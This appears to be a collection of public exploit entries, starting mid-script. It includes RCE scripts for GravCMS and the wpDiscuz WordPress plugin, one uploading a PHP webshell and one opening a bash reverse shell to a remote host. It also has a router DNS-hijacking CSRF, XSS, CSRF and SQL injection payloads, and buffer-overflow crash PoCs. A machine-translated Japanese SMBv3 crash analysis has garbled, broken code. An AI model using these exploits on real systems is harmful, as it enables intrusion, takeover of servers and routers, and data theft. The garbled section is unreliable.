soup = BeautifulSoup(r.text, features="lxml")
nonce = str(soup.findAll('input')[72])
form_id = str(soup.findAll('input')[71])
form_id = form_id[54:86]
nonce = nonce[46:78]
## Creating Page
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
payload = f'task=save&data%5Bheader%5D%5Btitle%5D={project_name}&data%5Bcontent%5D=%7B%7B+system%28%27{cmd}%27%29+%7D%7D&data%5Bfolder%5D={project_name}&data%5Broute%5D=&data%5Bname%5D=default&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&toggleable_data%5Bheader%5D%5Bprocess%5D=on&data%5Bheader%5D%5Bprocess%5D%5Btwig%5D=1&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={form_id}&form-nonce={nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&data%5Bheader%5D%5Bprocess%5D%5Bmarkdown%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0'
r = session.post(url+f"/admin/pages/{project_name}/:add",data=payload,headers=headers)
## Getting command output
r = session.get(url+f"/{project_name.lower()}")
if 'SyntaxError' in r.text:
print("[-] Command error")
else:
a = r.text.split('<section id="body-wrapper" class="section">')
b = a[1].split('</section>')
print(b[0][58:])
# Cleaning up
## Getting admin-nonce
r = session.get(url + "/admin/pages")
soup = BeautifulSoup(r.text, features="lxml")
nonce = str(soup.findAll('input')[32])
nonce = nonce[47:79]
## Deleting Page
r = session.get(url+f"/admin/pages/{project_name.lower()}/task:delete/admin-nonce:{nonce}")
login(url,username,password)
while True:
cmd = input("$ ")
rce(url,cmd)
# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe
# Version: 1.6.8
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Go to Register > Enter Registration Code...
#3.- Write anything in 'Name' field
#4.- Paste clipboard in 'Key' field
#5.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("NBM.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: Intelbras Router RF 301K - 'DNS Hijacking' Cross-Site Request Forgery (CSRF)
# Date: 01/05/2021
# Exploit Author: Rodolfo Mariano
# Version: Firmware 1.1.2-1.1.5
# CVE: 2021-32403
# Exploit Code:
<html>
<form action="http://10.0.0.1/goform/setSysTools" method="POST">
<input name="module3" value="lanCfg" type="hidden">
<input name="lanIP" value="10.0.0.1" type="hidden">
<input name="lanMask" value="255.255.255.0" type="hidden">
<input name="dhcpEn" value="true" type="hidden">
<input name="lanDhcpStartIP" value="10.0.0.100" type="hidden">
<input name="lanDhcpEndIP" value="10.0.0.200" type="hidden">
<input name="lanDns1" value="192.168.0.30" type="hidden">
<input name="lanDns2" value="" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
</html>
# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)
# Date: 2021/06/08
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://gvectors.com/
# Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip
# Version: wpDiscuz 7.0.4
# Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2)
# CVE : CVE-2020-24186
# Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I)
#!/bin/python3
import requests
import optparse
import re
import random
import time
import string
import json
parser = optparse.OptionParser()
parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog")
parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost")
options, args = parser.parse_args()
if not options.url or not options.path:
print('[+] Specify an url target')
print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost')
print('[+] Example help usage: exploit.py -h')
exit()
session = requests.Session()
main_url = options.url
path = options.path
url_blog = main_url + path
clean_host = main_url.replace('http://', '').replace('/wordpress','')
def banner():
print('---------------------------------------------------------------')
print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution')
print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload')
print('[-] CVE: CVE-2020-24186')
print('[-] https://github.com/hevox')
print('--------------------------------------------------------------- \n')
def csrfRequest():
global wmuSec
global wc_post_id
try:
get_html = session.get(url_blog)
response_len = str(len(get_html.text))
response_code = str(get_html.status_code)
print('[+] Response length:['+response_len+'] | code:['+response_code+']')
raw_wmu = get_html.text.replace(',','\n')
wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2]
print('[!] Got wmuSecurity value: '+ wmuSec +'')
raw_postID = get_html.text.replace(',','\n')
wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2]
print('[!] Got wmuSecurity value: '+ wc_post_id +' \n')
except requests.exceptions.ConnectionError as err:
print('\n[x] Failed to Connect in: '+url_blog+' ')
print('[x] This host seems to be Down')
exit()
def nameRandom():
global shell_name
print('[+] Generating random name for Webshell...')
shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))
time.sleep(1)
print('[!] Generated webshell name: '+shell_name+'\n')
return shell_name
def shell_upload():
global shell
print('[!] Trying to Upload Webshell..')
try:
upload_url = main_url + "/wp-admin/admin-ajax.php"
upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"}
upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog}
upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n"
check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)
json_object = (json.loads(check.text))
status = (json_object["success"])
get_path = (check.text.replace(',','\n'))
shell_pret = re.findall('url.*$',get_path,re.MULTILINE)
find_shell = str(shell_pret)
raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'',''))
shell = (raw.split(" ",1)[0])
if status == True:
print('[+] Upload Success... Webshell path:' +shell+' \n')
else:
print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
exit()
except requests.exceptions.HTTPError as conn:
print('[x] Failed to Upload Webshell in: '+ url_blog +' ')
return shell
def code_exec():
try:
while True:
cmd = input('> ')
codex = session.get(shell + '?cmd='+cmd+'')
print(codex.text.replace('GIF689a;','').replace('�',''))
except:
print('\n[x] Failed to execute PHP code...')
banner()
csrfRequest()
nameRandom()
shell_upload()
code_exec()
# Exploit Title: Backup Key Recovery 2.2.7 - Denial of Service (PoC)
# Date: 07/06/2021
# Author: Erick Galindo
# Vendor Homepage: http://www.nsauditor.com
# Software http://www.nsauditor.com/downloads/backeyrecovery_setup.exe
# Version: 2.2.7.0
# Tested on: Windows 10 Pro x64 es
# Proof of Concept:
#1.- Copy printed "AAAAA..." string to clipboard!
#2.- Open BackupKeyRecovery.exe
#3.- Go to Register > Enter Registration Code...
#4.- Write anything in 'Name' field
#5.- Paste clipboard in 'Key' field
#6.- Click on button -> Ok
buffer = "\x41" * 256
f = open ("poc.txt", "w")
f.write(buffer)
f.close()
# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting
# Date: 2021/08/06
# Exploit Author: Mert Daş
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: 3.0.3.7
# Tested on: Windows 10
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two.
It occurs when a malicious script is injected directly into a vulnerable web application.
Attack vector:
This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Subject of mail.
Steps-To-Reproduce:
1. Go to the opencart admin page.
2. Now go to the Marketing-Mail option.
3. Put the below payload in subject field of the Mail
: "<script>alert(11111)</script>"
5. Now click on send button.
6. The XSS will be triggered.
POST
/opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 187
Origin: http://127.0.0.1
Connection: close
Referer:
http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t
Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
# Exploit Title : OpenCart 3.0.3.7 - 'Change Password' Cross-Site Request Forgery (CSRF)
# Date : 2021/08/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : http://www.opencart.com/index.php?route=download/download
: https://github.com/opencart
# Software web : www.opencart.com
# Tested on: Server : Xampp
# Cross-site request forgery
OpenCart is an open source shoping cart system , suffers from Cross-site request forgery through which attacker can manipulate user data via sending him malicious craft url.
OpenCart is not using any security token to prevent it against CSRF.
It is vulnerable to all location inside User panel.
Header
----------------------------------------------------------
http://localhost/index.php?route=account/password
POST /opencart/index.php?route=account/password HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3890527419799841332130342675
Content-Length: 300
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/opencart/index.php?route=account/password
Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0
Upgrade-Insecure-Requests: 1
-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="password"
123asd!
-----------------------------3890527419799841332130342675
Content-Disposition: form-data; name="confirm"
123asd!
-----------------------------3890527419799841332130342675--
Response
HTTP/1.1 302 Found
Date: Tue, 08 Jun 2021 16:52:59 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Set-Cookie: OCSESSID=b21a152616460d44029878c9a0; path=/
Location: http://127.0.0.1/opencart/index.php?route=account/account
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
Simple Poc to change user Password
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/opencart/index.php?route=account/password" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="1234asd!" />
<input type="hidden" name="confirm" value="1234asd!" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection
# Date: 09.09.2020
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage : https://projectworlds.in
# Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version
# Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server.
The vulnerable parameter uri: /srms/student.php?class=<injection point>
exploit:
Parameter: class (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: class=-6346' OR 3657=3657#&rn=1
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1
Type: UNION query
Title: MySQL UNION query (random number) - 7 columns
Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1
# Exploit Title: TextPattern CMS 4.8.7 - Stored Cross-Site Scripting (XSS)
# Date: 2021/09/06
# Exploit Author: Mert Daş merterpreter@gmail.com
# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web: https://textpattern.com/
# Tested on: Server: Xampp
TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
TextPattern 4.8.7 is vulnerable; other versions may also be affected.
Header
-POST /textpattern/textpattern/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------1356274838636633083297009973
Content-Length: 4574
Origin: http://localhost
Connection: close
Referer: http://localhost/textpattern/textpattern/index.php?event=article&ID=2%27
Cookie: txp_login=admin%2C4c96cd31447df40aa2ceea6e052132b6; txp_login_public=895102db7badmin; language=en-gb; currency=USD; PHPSESSID=280d77vpc9brntkqclej5her85
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="ID"
2
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="event"
article
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="step"
edit
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="sPosted"
1623260284
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="sLastMod"
1623260295
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="AuthorID"
admin
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="LastModID"
admin
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Title"
"><img src=1 onerror=alert(1)>
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="textile_body"
1
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Body"
"><img src=1 onerror=alert(1)>
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="textile_excerpt"
1
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Excerpt"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Status"
4
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Section"
articles
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="override_form"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="year"
2021
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="month"
06
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="day"
09
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="hour"
19
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="minute"
38
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="second"
04
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_year"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_month"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_day"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_hour"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_minute"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="exp_second"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="sExpires"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Category1"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Category2"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="url_title"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="description"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Keywords"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="Image"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="custom_1"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="custom_2"
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="save"
Save
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="app_mode"
async
-----------------------------1356274838636633083297009973
Content-Disposition: form-data; name="_txp_token"
346eeab2db04acf953d13529f6be3a74
-----------------------------1356274838636633083297009973--
# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2)
# Original Exploit Author: Mehmet Ince
# Vendor Homepage: https://getgrav.org
# Version: 1.10.7
# Tested on: Debian 10
# Author: legend
#/usr/bin/python3
import requests
import sys
import re
import base64
target= "http://192.168.1.2"
#Change base64 encoded value with with below command.
#echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0
payload=b"""/*<?php /**/
file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh');
"""
s = requests.Session()
r = s.get(target+"/admin")
adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1)
if adminNonce != "" :
url = target + "/admin/tools/scheduler"
data = "admin-nonce="+adminNonce
data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append'
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)
0x01序文
昨年末、SMBプロトコルを見つけるためにエミュレータが設定されたとき、大企業に対するこのような単純で非常に効果的な攻撃が発見されたことが脆弱性が発見されました。 TL; DR:サービスの拒否エラーにより、BSODプロトコルはWindows 8.1およびWindows Server 2012 R2コンピューターに単一のパケットを送信できます。
0x02テスト環境
影響を受けるシステム:
・Windows8.1(x86)
・Windows Server 2012 R2(x64)
0x03背景知識
この脆弱性の根本原因を理解するには、SMBパケットがどのように構造化されているかを理解する必要があります。 SMBV1プロトコルヘッダーファイルを見てみましょう。
プロトコルフィールドがFFバイトから始まるのを見たように、SMBV2を見てみましょう
プロトコルフィールドは現在、FEバイトから始まるので、SMBV3はどうですか? SMBプロトコルのV3バージョンは既に暗号化されており、暗号化された通信にSMB2_Transformの特定のヘッダーを使用します。
SMBV3セッションの交渉はSMBV2セッションから始まることを公式ドキュメントで学ぶことができるため、SMBV3は常に暗号化されています。 SMBV3セッションをセットアップするときに関係するパケットは次のとおりです。
1〜8バイトのパケットで、SMBヘッダーは次のようになります。
使用されるバイトシーケンスはまだ0xfeであり、これは公式のMicrosoftドキュメントに示されているSMBV2のコードであることがわかります。
バイト9から始まると、暗号化は接続された状態にあり、ヘッダーで使用されるバイトシーケンスは0xfd 
になります
POCでわかるように、最初のセッション中に0xFDヘッダーを備えたSMBパケットがすぐに送信されると、カーネルのクラッシュが発生します。さて、このクラッシュの根本原因を理解するために、クラッシュダンプメカニズムを掘り下げましょう。
0x04ルール原因分析
Windows 8.1(x86)でのみ実行されて根本原因を分析すると、特定のパケットを送信すると、アドレス0x00000030で保護された値(空のページ保護)をメモリから読み取るため、カーネルがクラッシュします。
クラッシュするモジュールは「MRXSMB.SYS」です。これは、Microsoft Server Message Block(SMB)のResizerです。クラッシュの正確な位置はMRXSMBです! SMBWKSRECEIVEEVENT + 8539。[ECX + 30H]からEAXへのオフセットで、ECXの値は0x00000000を指します。 IDAを通るフローを分析するとき、それは次のようになります。パケットを処理し、暗号化が有効になっているかどうかを確認します。
3.0関連
Windbgでは、次のように見えます。
基本的に、暗号化が有効になっているかどうかを確認します。この場合、「エラー」パスに従い、次の関数に移動します。
いくつかの比較手順を実行し、2番目の最後の命令は、ECXがHEX値0x34に登録されているかどうかを確認することです。 ECXが0x34以下の場合、この場合にエラーが発生します。
「エラー」パスに従って:別の命令が発生します。その場合、レジスタEDX(攻撃者の制御可能な値)が[ESP+4C]の値よりも高い場合、「実際の」パスに従います。
さまざまなレジスタの値:
次の命令では、ECXの値を再び0x34に比較します。ECXが0x34よりも高い場合、「実際の」パスに従います
この場合、ECXの値は0x34よりも高いため、実際のパスに従います。次の命令ブロックでは、_MICROSOFT_WINDOWS_SMBCLIENTENABLEBITS '値0x80000000の間の値をテストします。 Windbgでは、テストが「エラー」になることがわかります。これにより、「エラー」パスに従います。
常に「真」であるテスト指示を受け入れるように導く
loca0f20e05関数を使用する代わりに、ゼロをスタックの後ろに置きます。その場合、 "loca0f20e15"を実行します。ECX + 30HをEAXに移動する命令で、ECXが0x000000000であるためにクラッシュが発生します。
これにより、カーネルがクラッシュし、マシンの再起動を強制します。
0x05 POC
を使用しますImport SocketServer
binasciiからインポートUnexlifyから
ペイロード='000000ECFD534D424141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 ''
Class Byebye(socketserver.baserequesthandler):
defハンドル(自己):
try:
'from:'、self.client_addressを印刷します
印刷'[*]ペイロードの送信.'
self.request.send(unsexlify(ペイロード))
例外を除く:
印刷「BSODトリガーオン」、self.client_address
合格
socketserver.tcpserver.allow_reuse_address=1
起動=socketserver.tcpserver(( ''、445)、byebye)
launch.serve_forever()
0x06脆弱性の再発
1。KALIでスクリプトを実行します
2.次に、Windows 2012 R2で共有アドレス: \\ 10.0.0.217にアクセスすると、すぐにオペレーティングシステムのブルースクリーンが表示されます。
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
# Software Link: https://wordpress.org/plugins/visitors-app/
# Version: 0.3
# Tested on: Debian GNU/Linux 10
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
## Description:
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
# The 'user-agent' parameter allows attacker to escalate their privileges.
## PoC
# Replace google.com with malicious attacker page
curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"
# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC)
# Date: 06-09-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619
# Version: 4.2
# Category: DoS (iOS)
##### Vulnerability #####
Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note:
# STEPS #
# Open the program.
# Create a new Note.
# Run the python exploit script payload.py, it will create a new payload.txt file
# Copy the content of the file "payload.txt"
# Paste the content from payload.txt twice in the new Note.
# Crashed
Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.
##### PoC #####
--> payload.py <--
#!/usr/bin/env python
buffer = "\x41" * 350000
try:
f = open("payload.txt","w")
f.write(buffer)
f.close()
print ("File created")
except:
print ("File cannot be created")